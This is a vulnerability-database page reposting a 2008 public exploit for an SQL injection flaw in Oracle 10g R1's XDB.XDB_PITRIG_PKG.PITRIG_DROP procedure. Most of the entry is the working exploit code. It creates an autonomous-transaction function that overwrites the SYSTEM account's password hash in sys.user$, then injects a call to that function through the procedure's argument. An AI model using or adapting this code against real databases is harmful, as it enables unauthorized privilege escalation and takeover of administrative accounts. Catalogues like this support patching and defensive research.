Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

oracle-dropsql.txt

🗓️ 28 Jan 2008 00:00:00Reported by Sh2kerrType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP SQL Injection Exploit to change system password. Tested on oracle 10.1.0.2.0. Public exploit date: January 25, 2008. Written by Alexandr "Sh2kerr" Polyakov.

Show more
Code
`/******************************************************************/  
/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/  
/******* SQL Injection Exploit **********/  
/******************************************************************/  
/************ exploit change system password **************/  
/******************************************************************/  
/****************** BY Sh2kerr (Digital Security) ***************/  
/******************************************************************/  
/***************** tested on oracle 10.1.0.2.0 *******************/  
/******************************************************************/  
/******************************************************************/  
/* Date of Public EXPLOIT: January 25, 2008 */  
/* Written by: Alexandr "Sh2kerr" Polyakov */  
/* email: [email protected] */  
/* site: http://www.dsec.ru */  
/******************************************************************/  
/* Original Advisory by: */  
/* Alexandr Polyakov [ [email protected]] */  
/* Reported: 18 Dec 2007 */  
/* Date of Public Advisory: January 15, 2008 */  
/* Advisory: http://www.oracle.com/technology/deploy/ */  
/* security/critical-patch-updates/cpujan2008.html */  
/* */  
/******************************************************************/  
  
  
  
/* set password 12345 to user SYSTEM */  
  
CREATE OR REPLACE FUNCTION CHANGEPASS return varchar2  
authid current_user as  
pragma autonomous_transaction;  
BEGIN  
EXECUTE IMMEDIATE 'update sys.user$ set password=''EC7637CC2C2BOADC'' where name=''SYSTEM''';  
COMMIT;  
RETURN '';  
END;  
/  
  
EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)');  
  
  
  
  
  
  
/******************************************************************/  
/*************************** SEE U LATER ;) ***********************/  
/******************************************************************/  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4
oraclesql injectionexploitsecuritypassword changesystem10g r1digital securityadvisorypublicdatejanuary 25 2008sh2kerrdsecautonomous transactionxdb
23
.json
Report